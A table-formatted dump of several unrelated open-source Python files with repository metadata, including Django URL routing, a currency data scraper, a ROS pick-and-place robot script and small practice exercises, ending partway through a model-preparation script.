blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b64a892771db4f09e82dc8848ce1e8a456c0b1ac | 7930864c38fd8aeaf3c9dd0bb396aaeb1ee0a0f2 | /mysite/mysite/urls.py | cfb6617a3019c34a3703d92c17c80a7cd8acdcea | [] | no_license | ksmith-1989/blog | 8caa46cff8f9dae4c4e6b3839c981520b0e9bbd0 | d46d786bd1320b7bf840f0bc40ddd6408eb358d2 | refs/heads/master | 2022-09-01T00:13:25.390912 | 2020-05-20T06:38:31 | 2020-05-20T06:38:31 | 265,130,040 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('blog/', include('blog.urls')),
path('admin/', admin.site.urls),
]
| [
"kj10068@gmail.com"
] | kj10068@gmail.com |
7b10e1771bc7133cd12e42ff4ced75617ba3270c | 826cdefb3554e6bbc7b5e5fa9bc6f55268cd58dd | /src/main/python/basics/itertools.py | 4c731ae4d27d12208d8fbb8b22bcd656bceb3a3f | [] | no_license | lj015625/CodeSnippet | 67d1f556497948b3db51c67af07f16a21751427e | 73e9375c5d7edcc50170569c0bd99fd415557d85 | refs/heads/master | 2023-09-01T14:59:57.162553 | 2023-08-24T11:07:37 | 2023-08-24T11:07:37 | 61,499,418 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import itertools as it
def combinational_dice_rolls(n, m):
return list(it.product(range(1, m+1), repeat=n))
combinational_dice_rolls(2,2)
def cartesian_product(arr1, arr2):
print(*it.product(A, B))
A = [1,2,3]
B = [1,2,3]
cartesian_product(A,B)
s, n = 2, 3
s = sorted(str(s))
n = int(n)
for i in it.permutations(s,n):
print(''.join(i), sep='\n')
s, n = 'ABC', 2
for i in range(1, int(n)+1):
for j in it.combinations(sorted(s), i):
print(''.join(j))
# This tool returns length subsequences of elements from the input iterable allowing individual elements to be repeated more than once.
s, n = 'ABC', 2
for c in it.combinations_with_replacement(sorted(s), int(n)):
print("".join(c))
# create list of tuples from repeating items in a string
print(*[(len(list(values)), int(key)) for key, values in it.groupby('12345')])
# count number of a in combinations
n = 4
arr = ['a', 'a', 'c', 'd']
k = 2
count = 0
total = 0
for t in it.combinations(arr, k):
total += 1
count += 'a' in t
print(count/total)
| [
"leonardo.ji@cerner.com"
] | leonardo.ji@cerner.com |
689d10639b1ba6a0ebc83a093cb7bb8d7adaf79a | d2b533cf97fc7c09534bec634e9984b41b2188cc | /chapter_15/random_walk.py | 138bdc47d740f2423b5aa7d816d9615fb99a6083 | [] | no_license | EdwardHc/python | 65f5dbb99a547b5de9d918deb8e019ada124ad22 | 31af9adf3c2e300164072a428b5a273b94f8bf46 | refs/heads/master | 2020-04-10T23:10:10.506947 | 2018-12-20T14:54:09 | 2018-12-20T14:54:09 | 161,343,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | from random import choice
class RandomWalk():
'''一个生成随机漫步数据的类'''
def __init__(self,num_points=5000):
'''初始化随机漫步的属性'''
self.num_points=num_points
#所有随机漫步都始于(0,0)
self.x_values=[0]
self.y_values=[0]
def get_step(self):
'''计算每次移动步数'''
direction=choice([1,-1])
distance=choice([0,1,2,3,4,5,6,7,8])
step=direction*distance
return step
def fill_walk(self):
'''计算随机漫步包含的所有点'''
#不断漫步直到到达指定的长度
while len(self.x_values)<self.num_points:
#决定前进方向以及演这个方向前进的距离
x_step=self.get_step()
y_step=self.get_step()
#拒绝原地踏步
if x_step==0 and y_step==0:
continue
#计算下一个点的x和y值
next_x=self.x_values[-1]+x_step
next_y=self.y_values[-1]+y_step
self.x_values.append(next_x)
self.y_values.append(next_y)
| [
"aahuichao0811@126.com"
] | aahuichao0811@126.com |
ece4d0ba4c813bec3de36f51ced17e2d06a8f913 | 868d4287d986abe26f2ef8e0ee4c0a8bb29c136f | /imagedetection.py | 12e6029b9964ac8557620c04e1f3ceab077c1166 | [] | no_license | 87jaydeepsingh/python-test-files- | edf9c46af4ed84137a7d594a958f093b33ced2a0 | e836a940301b1b77c29c25d7d84cb1473147a72c | refs/heads/master | 2023-06-18T09:08:57.237784 | 2021-07-20T18:42:15 | 2021-07-20T18:42:15 | 387,876,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | import face_recognition
known_image = face_recognition.load_image_file("test.jpg")
unknown_image = face_recognition.load_image_file("download.jpg")
biden_encoding = face_recognition.face_encodings(known_image)[0]
unknown_encoding = face_recognition.face_encodings(unknown_image)[0]
results = face_recognition.compare_faces([biden_encoding], unknown_encoding)
print(results)
| [
"87jaydeepsingh@github.com"
] | 87jaydeepsingh@github.com |
bc64be2d69532cff8650b5bcfc4817578ae55e87 | efaeb34b3c86ef9d79be6f4b9e17f34080d117e9 | /tests/test_network.py | c941b44771d583b3e1a4d10c00cbc9628661065b | [] | no_license | Mazyod/ethogram | f64346180536e75c404c94ef5c04ab833b00b454 | c5498f2de31e6c6cb4c06569d7884b10a89bbabe | refs/heads/master | 2021-04-27T02:26:32.396570 | 2019-03-08T14:32:38 | 2019-03-08T14:32:38 | 122,696,093 | 6 | 2 | null | 2018-06-01T20:48:28 | 2018-02-24T02:44:27 | Python | UTF-8 | Python | false | false | 291 | py | import unittest
from ethogram.network import Network
class NetworkTests(unittest.TestCase):
def test_fetch_all_rigs(self):
network = Network()
rigs = network.fetch_rigs("mazyod")
self.assertEqual(len(rigs), 1)
self.assertEqual(rigs[0].name, "mastery")
| [
"mazjaleel@gmail.com"
] | mazjaleel@gmail.com |
684e78d298475edf5350934fbb380bb497a3bb7e | 0cc9ba497efeae7de808b3063f932cee9449bc20 | /akshare/fx/currency_investing.py | 41abf6485117ce7ccd18ebed6240baa7a5dd72a6 | [
"MIT"
] | permissive | louis100/akshare | 08dc7d71c194e973092174dabc307e28a2aaf7d6 | 0b2ad15982dc1e4081929ed634e96c559bf3ef7e | refs/heads/master | 2022-12-12T16:26:38.294899 | 2020-09-16T04:25:46 | 2020-09-16T04:25:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,907 | py | # -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Date: 2020/9/9 11:56
Desc: 英为财情-外汇-货币对历史数据
https://cn.investing.com/currencies/
https://cn.investing.com/currencies/eur-usd-historical-data
"""
import re
import pandas as pd
import requests
from bs4 import BeautifulSoup
from akshare.index.cons import short_headers, long_headers
def _currency_name_url() -> dict:
"""
货币键值对
:return: 货币键值对
:rtype: dict
"""
url = "https://cn.investing.com/currencies/"
res = requests.post(url, headers=short_headers)
data_table = pd.read_html(res.text)[0].iloc[:, 1:] # 实时货币行情
data_table.columns = ['中文名称', '英文名称', '最新', '最高', '最低', '涨跌额', '涨跌幅', '时间']
name_code_dict = dict(
zip(data_table["中文名称"].tolist(), [item.lower().replace("/", "-") for item in data_table["英文名称"].tolist()]))
return name_code_dict
def currency_hist(symbol: str = "usd-vnd", start_date: str = "20050101", end_date: str = "20200717") -> pd.DataFrame:
"""
外汇历史数据, 注意获取数据区间的长短, 输入任意货币对, 具体能否获取, 通过 currency_name_code_dict 查询
:param symbol: 货币对
:type symbol: str
:param start_date: 日期
:type start_date: str
:param end_date: 日期
:type end_date: str
:return: 货币对历史数据
:rtype: pandas.DataFrame
"""
start_date = "/".join([start_date[:4], start_date[4:6], start_date[6:]])
end_date = "/".join([end_date[:4], end_date[4:6], end_date[6:]])
temp_url = f"https://cn.investing.com/currencies/{symbol.lower().replace('/', '-')}-historical-data"
res = requests.post(temp_url, headers=short_headers)
soup = BeautifulSoup(res.text, "lxml")
title = soup.find("h2", attrs={"class": "float_lang_base_1"}).get_text()
res = requests.post(temp_url, headers=short_headers)
soup = BeautifulSoup(res.text, "lxml")
data = soup.find_all(text=re.compile("window.histDataExcessInfo"))[0].strip()
para_data = re.findall(r"\d+", data)
payload = {
"curr_id": para_data[0],
"smlID": para_data[1],
"header": title,
"st_date": start_date,
"end_date": end_date,
"interval_sec": "Daily",
"sort_col": "date",
"sort_ord": "DESC",
"action": "historical_data",
}
url = "https://cn.investing.com/instruments/HistoricalDataAjax"
res = requests.post(url, data=payload, headers=long_headers)
soup = BeautifulSoup(res.text, "lxml")
vest_list = [item.get_text().strip().split("\n") for item in soup.find_all("tr")]
raw_df = pd.DataFrame(vest_list)
df_data = pd.DataFrame(vest_list, columns=raw_df.iloc[0, :].tolist()).iloc[1:-1, :]
df_data.index = pd.to_datetime(df_data["日期"], format="%Y年%m月%d日")
df_data["涨跌幅"] = pd.DataFrame(round(df_data['涨跌幅'].str.replace('%', '').astype(float) / 100, 6))
del df_data["日期"]
df_data.iloc[:, :-1] = df_data.iloc[:, :-1].applymap(lambda x: x.replace(',', ''))
df_data = df_data.astype(float)
return df_data
def _currency_single() -> pd.DataFrame:
"""
英为财情-外汇-单种货币兑换汇率-单种货币列表
:return: 单种货币列表
:rtype: pandas.DataFrame
"""
url = "https://cn.investing.com/currencies/single-currency-crosses"
res = requests.post(url, headers=short_headers)
soup = BeautifulSoup(res.text, "lxml")
name_url_option_list = soup.find("select", attrs={"class": "newInput selectBox"}).find_all("option")
temp_df = pd.DataFrame([item.get_text().split('-', 1) for item in name_url_option_list])
temp_df.columns = ["short_name", "name"]
temp_df["short_name"] = temp_df["short_name"].str.strip()
temp_df["name"] = temp_df["name"].str.strip()
temp_df["code"] = [item["value"] for item in name_url_option_list]
return temp_df
def currency_name_code(symbol: str = "usd/jpy") -> pd.DataFrame:
"""
当前货币对的所有可兑换货币对
:param symbol: "usd/jpy"
:type symbol: str
:return: 中英文货币对
:rtype: pandas.DataFrame
name code
0 欧元/美元 eur-usd
1 英镑/美元 gbp-usd
2 美元/日元 usd-jpy
3 美元/瑞士法郎 usd-chf
4 澳大利亚元/美元 aud-usd
.. ... ...
268 日元/新加坡元 jpy-sgd
269 科威特第纳尔/日元 kwd-jpy
270 日元/白俄罗斯卢布 jpy-byn
271 日元/乌克兰赫里纳 jpy-uah
272 日元/土耳其里拉 jpy-try
"""
symbol = symbol.upper()
currency_df = _currency_single()
url = "https://cn.investing.com/currencies/Service/ChangeCurrency"
params = {
"session_uniq_id": "53bee677662a2336ec07b40738753fc1",
"currencies": currency_df[currency_df["short_name"] == symbol.split("/")[0]]["code"].values[0],
}
headers = {"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"Host": "cn.investing.com",
"Pragma": "no-cache",
"Referer": "https://cn.investing.com/currencies/single-currency-crosses",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"X-Requested-With": "XMLHttpRequest",
}
res = requests.get(url, params=params, headers=headers)
temp_df = pd.read_html(res.json()["HTML"])[0].iloc[:, 1:]
temp_df.rename(columns={"名称.1": "简称"}, inplace=True)
temp_df["pids"] = [item[:-1] for item in res.json()["pids"]]
name_code_dict_one = dict(zip(temp_df["名称"].tolist(), [item.lower().replace("/", "-") for item in temp_df["简称"].tolist()]))
params = {
"session_uniq_id": "53bee677662a2336ec07b40738753fc1",
"currencies": currency_df[currency_df["short_name"] == symbol.split("/")[1]]["code"].values[0],
}
headers = {"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"Host": "cn.investing.com",
"Pragma": "no-cache",
"Referer": "https://cn.investing.com/currencies/single-currency-crosses",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"X-Requested-With": "XMLHttpRequest",
}
res = requests.get(url, params=params, headers=headers)
temp_df = pd.read_html(res.json()["HTML"])[0].iloc[:, 1:]
temp_df.rename(columns={"名称.1": "简称"}, inplace=True)
temp_df["pids"] = [item[:-1] for item in res.json()["pids"]]
name_code_dict_two = dict(zip(temp_df["名称"].tolist(), [item.lower().replace("/", "-") for item in temp_df["简称"].tolist()]))
name_code_dict_one.update(name_code_dict_two)
temp_df = pd.DataFrame.from_dict(name_code_dict_one, orient="index").reset_index()
temp_df.columns = ["name", "code"]
return temp_df
if __name__ == '__main__':
currency_name_code_df = currency_name_code(symbol="usd/jpy")
print(currency_name_code_df)
currency_hist_df = currency_hist(symbol="usd-mmk", start_date="20131018", end_date="20200915")
print(currency_hist_df)
| [
"jindaxiang@163.com"
] | jindaxiang@163.com |
bdf1986e8d10fb5da6a93a381a574ceed36d5151 | 2bc833baedc7244c88162e0d254dc46ab9c38fd0 | /src/hello_ros/src/picknplace_object.py | 298d7579570a04833069cb48bc8f176fad2dd64b | [] | no_license | mmmmimic/Pick-and-Place | 5a6b289cac1d14d1f2b3e83140a4494771248a48 | c27a28223b2c54c9679d2fc5874534aeeaa657c5 | refs/heads/master | 2022-09-16T21:47:41.064299 | 2020-06-03T21:16:03 | 2020-06-03T21:16:03 | 214,512,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,423 | py | #!/usr/bin/env python
'''
mini project1
pick and place
Created by Group 5
07/10/2019
'''
import roslib
roslib.load_manifest('hello_ros')
import rospy
import numpy as np
from std_msgs.msg import String
from gazebo_msgs.msg import ModelStates
import sys
import moveit_commander
import geometry_msgs.msg
import moveit_msgs.msg
import copy
from sensor_msgs.msg import JointState
import tf_conversions
import math
import tf, random
import sys
#pos = []
class Planner(object):
'''Pick and Place Robot'''
def __init__(self, *args, **kwargs):
'''Initialization'''
print "Initializing the program"
moveit_commander.roscpp_initialize(sys.argv) #initialize the moveit commander(a class), allowing us to communicate with the move_group
rospy.init_node('move_arm',anonymous=True) # initialize the node, note that there is only allowed to be one node in a program
self.robot = moveit_commander.RobotCommander()
self.scene = moveit_commander.PlanningSceneInterface()
p = moveit_commander.PlanningScene()
p.is_diff=True # initialize the scene
group = moveit_commander.MoveGroupCommander('Arm') # move the arm
group.set_planner_id("RRTkConfigDefault") # the default planner is RTT
## setup the planner
self.update()
group.set_goal_orientation_tolerance(0.01)
group.set_goal_tolerance(0.01)
group.set_goal_joint_tolerance(0.05)
group.set_goal_position_tolerance(0.01)
group.set_num_planning_attempts(100) # try 100 times
self.group = group
## trajectories for RVIZ to visualize.
self.display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',moveit_msgs.msg.DisplayTrajectory,queue_size=1000)
self.scene_pub = rospy.Publisher('/move_group/monitored_planning_scene', moveit_msgs.msg.PlanningScene,queue_size=1000)
self.time = 1 # regular rest time
self.currentJointState = JointState()
#print some basic infomation
print "============ Reference frame: %s ============" % group.get_planning_frame() # the reference frame for this robot
print "============ End effector frame: %s ============" % group.get_end_effector_link() # the end-effector link for this group
print "============ Robot Groups:"
print self.robot.get_group_names() # groups in the robot
print "============ robot state"
print self.robot.get_current_state() # state of the robot
print "============"
def createScene(self):
'''Create the scene and import the objects into the rviz'''
position = self.position
po_size = len(position) # the number of elements of the objects in the "world"
cube_num = po_size-3 # the number of cubes is equal to the sum minus 'robot' and 'desk'
for i in range(cube_num+1): # put the objects
p = geometry_msgs.msg.PoseStamped() # data type: stamped
p.header.frame_id = robot.get_planning_frame()
cube = position[i+2]
p.pose.orientation.w = cube.orientation.w
p.pose.orientation.x = cube.orientation.x
p.pose.orientation.y = cube.orientation.y
p.pose.orientation.z = cube.orientation.z
p.pose.position.x = cube.position.x
p.pose.position.y = cube.position.y
p.pose.position.z = cube.position.z
if i < cube_num:
scene.add_box('cube'+str(i), p,(0.05,0.05,0.05))
print "cube"+str(i)+" added!"
else:
#scene.add_mesh('bucket', p,'./catkin_ws/src/hello_ros/urdf/bucket.dae') # try to import bucket into the scene but failed //2019.10.8
print "bucket added!"
self.scene_pub.publish(moveit_msgs.msg.PlanningScene) # publish the scene
def openGripper(self):
''' open the gripper to fetch objects'''
#rospy.init_node('test_publish')
# Setup subscriber
#rospy.Subscriber("/joint_states", JointState, jointStatesCallback)
currentJointState = self.currentJointState
pub = rospy.Publisher("/jaco/joint_control", JointState, queue_size=1)
currentJointState = rospy.wait_for_message("/joint_states",JointState) # get current joint variables, 9 joints here
#print 'Received!'
currentJointState.header.stamp = rospy.get_rostime()
tmp = 0.005 # set the finger joint variables smaller
#print currentJointState.position
#tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))
currentJointState.position = tuple(list(currentJointState.position[:6]) + [tmp] + [tmp]+ [tmp])
for i in range(3):
pub.publish(currentJointState)
#print 'Published!'
rospy.sleep(self.time)
def closeGripper(self):
''' close the gripper after dropping the objects'''
#rospy.init_node('test_publish')
# Setup subscriber
#rospy.Subscriber("/joint_states", JointState, jointStatesCallback)
currentJointState = self.currentJointState
pub = rospy.Publisher("/jaco/joint_control", JointState, queue_size=1)
currentJointState = rospy.wait_for_message("/joint_states",JointState) # get current joint variables, 9 joints here
#print 'Received!'
currentJointState.header.stamp = rospy.get_rostime()
tmp = 0.7 # set the finger joint variables larger
#tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))
#print currentJointState.position
currentJointState.position = tuple(list(currentJointState.position[:6]) + [tmp] + [tmp]+ [tmp])
for i in range(3):
pub.publish(currentJointState)
#print 'Published!'
rospy.sleep(self.time)
def rvizTraj(self, plan):
'''show the plan in rviz'''
print "============Show in rviz============"
display_trajectory = moveit_msgs.msg.DisplayTrajectory()
display_trajectory.trajectory_start = self.robot.get_current_state()
display_trajectory.trajectory.append(plan)
self.display_trajectory_publisher.publish(display_trajectory);
def showPlan(self, plan):
'''show the plan'''
print "============ Show the plan ============"
print plan
print "============"
def moveJoint(self, joint_value, show_plan=False, show_rviz=False):
'''set joint variable values, then move the arm'''
group = self.group
# joint_value = self.robot.get_current_state().joint_state.position
group.set_joint_value_target(joint_value)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time) # rest 5 seconds
def jointCorrection(self, deviation, show_plan=False, show_rviz=False):
'''set the joint variable deviation, then move the arm'''
group = self.group
joint_value = self.robot.get_current_state().joint_state.position
#print joint_value
#print deviation
joint_value = list(joint_value)
for i in range(6):
joint_value[i] = joint_value[i]+deviation[i]
#joint_value = tuple(joint_value)
#print joint_value[:6]
group.set_joint_value_target(joint_value[:6])
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time) # rest 5 seconds
def moveObj(self, series, show_plan = False, show_rviz=False, height = 1):
'''move the end effector to on the top of an object'''
group = self.group
pose_goal = group.get_current_pose().pose
position = self.position
objects = position[series] # position[robot,desk,cube0,cube1,...,bucket]
pose_goal.position.x =objects.position.x
pose_goal.position.y =objects.position.y
#pose_goal.position.z =cube.position.z
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0., -math.pi/2, 0.)) # make the gripper normal to the desk
pose_goal.position.z =height # 0.95 is the best value we can have, but we can change the height
#print series
#print pose_goal
group.set_pose_target(pose_goal)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
group.go(wait=True)
#group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time)
def movePose(self, pose, show_plan = False, show_rviz=False, is_rot = False):
'''move the end effector to a given position, pose:[x,y,z,r,p,y]'''
group = self.group
pose_goal = group.get_current_pose().pose
position = self.position
if is_rot:
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0., -math.pi/2, 0.)) # make the gripper normal to the desk
else:
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(pose[3], pose[4], pose[5])) # make the gripper normal to the desk
pose_goal.position.x = pose[0]
pose_goal.position.y = pose[1]
pose_goal.position.z = pose[2]
#print pose_goal
group.set_pose_target(pose_goal)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time)
def poseCorrection(self, pos, ang=[0.,-math.pi/2,0.], show_plan = False, show_rviz=False):
'''set the position deviation, then move the arm, pos:[x,y,z] ang:[r,p,y]'''
group = self.group
pose_goal = group.get_current_pose().pose
position = self.position
pose_goal.position.x = pose_goal.position.x+pos[0]
pose_goal.position.y = pose_goal.position.y+pos[1]
pose_goal.position.z = pose_goal.position.z+pos[2]
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(ang[0], ang[1], ang[2]))
print pose_goal
group.set_pose_target(pose_goal)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
#rospy.sleep(self.time)
def update(self):
'''update the place of the cubes'''
print "-> update position"
State = rospy.wait_for_message("/gazebo/model_states", ModelStates) # get cube positions
self.position = State.pose
def pickAndPlace(self,series):
'''pick a cube and drop it into the bucket'''
print "move to the object"
print "----------cube"+str(series+1)+"/"+str(len(self.position)-3)+"----------"
print "-> above the cube"
self.moveObj(2+series) # moveObj(2) is to move the first cube
#print "-> open the gripper"
#self.openGripper()
print "-> go down"
self.moveObj(2+series,height=0.94)
print "-> close the gripper"
self.closeGripper()
print "-> rise up"
self.moveObj(2+series, height=1.25)
print "-> move to the bucket"
self.moveObj(-1,height = 1.45)
print "-> open the gripper"
self.openGripper()
print ' '
def run(self):
try:
cube_num = len(self.position)-3 # the number of the cubes
#print "initializing... -> open the gripper"
#self.openGripper()
for i in range(cube_num):
self.pickAndPlace(i)
self.update() # update the cube place to avoid accidental collisions
R = rospy.Rate(50)
while not rospy.is_shutdown():
rospy.spin()
R.sleep
except rospy.ROSInterruptException:
pass
if __name__=="__main__":
#global pos
'''def call_back(msg):
#print 'Received'
global pos
pos = msg.pose # record the position of the robots,cubes and bucket
print pos
#rospy.Subscriber('gazebo/model_states', ModelStates, call_back, queue_size=1000)
#print pos
#sys.exit(1)
'''
p = Planner()
p.run()
| [
"matthewlin98@hotmail.com"
] | matthewlin98@hotmail.com |
6b2e29155e7989d4f19247ee43a3ae011cd71080 | a3c662a5eda4e269a8c81c99e229879b946a76f6 | /.venv/lib/python3.7/site-packages/pylint/test/functional/line_endings.py | 0b6e795e3f2c9b2e9ec6f93c33469324e1ea67ba | [
"MIT"
] | permissive | ahmadreza-smdi/ms-shop | 0c29da82c58b243507575672bbc94fb6e8068aeb | 65ba3f3061e2ac5c63115b08dadfe7d67f645fb6 | refs/heads/master | 2023-04-27T19:51:34.858182 | 2019-11-24T20:57:59 | 2019-11-24T20:57:59 | 223,616,552 | 6 | 2 | MIT | 2023-04-21T20:51:21 | 2019-11-23T16:09:03 | Python | UTF-8 | Python | false | false | 107 | py | "mixing line endings are not welcome"
# +1: [unexpected-line-ending-format, mixed-line-endings]
CONST = 1
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
8c66385405873707fcd3fa458d8f11637899adb4 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/323/usersdata/278/89121/submittedfiles/mdc.py | 3185a3f53219a38653c6a227ae7e28e217f85f66 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | # -*- coding: utf-8 -*-
import math
n1 = int(input("Digite o primeiro número inteiro: "))
n2 = int(input("Digite o segundo número inteiro: "))
mdc=1
if n1>n2:
for i in range (2,n2,1):
resto1=n1%i
resto2=n2%i
if resto1==0 and resto2==0:
mdc=mdc*i
if mdc==1:
print(mdc)
else:
print(mdc/2)
if n2>n1:
for i in range (2,n2,1):
resto1=n1%i
resto2=n2%i
if resto1!=0 and resto2!=0:
mdc=mdc*i
if mdc==1:
print(mdc)
else:
print(mdc/2)
if n1==n2:
print(n1)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
cf6cdee9548d5e2bf2bc60c5ac516c2831f29116 | 6517bd4dac45eb82e309b9fde8b6bc6a60741d72 | /dj_env/lib/python3.7/site-packages/django_plotly_dash/routing.py | 10cd9c65179c3b558eb0cd5c239a6a33c9b4eb72 | [] | no_license | labanyamukhopadhyay/mara-app | 17488ee6157a3690796685087a8cb0c3aeba9278 | 5b95a99b6cf603cd19a236d324ed3d1212c5ebbe | refs/heads/main | 2023-04-11T16:16:52.707651 | 2021-04-24T01:06:07 | 2021-04-24T01:06:07 | 341,999,086 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,985 | py | '''
Routing for standard pipe connections
Copyright (c) 2018 Gibbs Consulting and others - see CONTRIBUTIONS.md
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.auth import AuthMiddlewareStack
from channels.http import AsgiHandler
from django.conf.urls import url
from django.urls import re_path
from .consumers import MessageConsumer, PokePipeConsumer
from .util import pipe_ws_endpoint_name, http_endpoint, http_poke_endpoint_enabled
# TODO document this and discuss embedding with other routes
http_routes = [
]
if http_poke_endpoint_enabled():
http_routes.append(re_path(http_endpoint("poke"), PokePipeConsumer))
http_routes.append(re_path("^", AsgiHandler)) # AsgiHandler is 'the normal Django view handlers'
application = ProtocolTypeRouter({
'websocket': AuthMiddlewareStack(URLRouter([re_path(pipe_ws_endpoint_name(), MessageConsumer),])),
'http': AuthMiddlewareStack(URLRouter(http_routes)),
})
| [
"labanyam@hotmail.com"
] | labanyam@hotmail.com |
b2b57465fe49db3db5b58fef26c370a7f74985ee | ba88cd6db28f160fec810d69e27fdd42c84b753a | /prep_model.py | f87cdab4ae43ca39ff5f905f99fd5e81bf0681b1 | [
"MIT"
] | permissive | erhanbas/imgclsmob | 02057ceabf863ce571507abbee89d7d4fd3431b3 | 5eacf51b96c8e715f73a77261395f0fac35dfffc | refs/heads/master | 2023-03-11T05:43:02.358759 | 2021-02-11T17:56:22 | 2021-02-11T17:56:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,378 | py | """
Script for preparing the model for publication.
"""
import os
import argparse
import subprocess
import shutil
import re
import hashlib
import zipfile
import pandas as pd
def parse_args():
"""
Parse python script parameters.
Returns:
-------
ArgumentParser
Resulted args.
"""
parser = argparse.ArgumentParser(description="Prepare model",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"--model",
type=str,
required=True,
help="model name")
parser.add_argument(
"--resume",
type=str,
default="",
help="model weights (Gluon) file path")
args = parser.parse_args()
return args
def calc_sha1(file_name):
"""
Calculate sha1 hash of the file content.
Parameters:
----------
file_name : str
Path to the file.
sha1_hash : str
Expected sha1 hash in hexadecimal digits.
Returns:
-------
str
sha1 hex digest.
"""
sha1 = hashlib.sha1()
with open(file_name, "rb") as f:
while True:
data = f.read(1048576)
if not data:
break
sha1.update(data)
return sha1.hexdigest()
def post_process(dst_dir_path,
model_name,
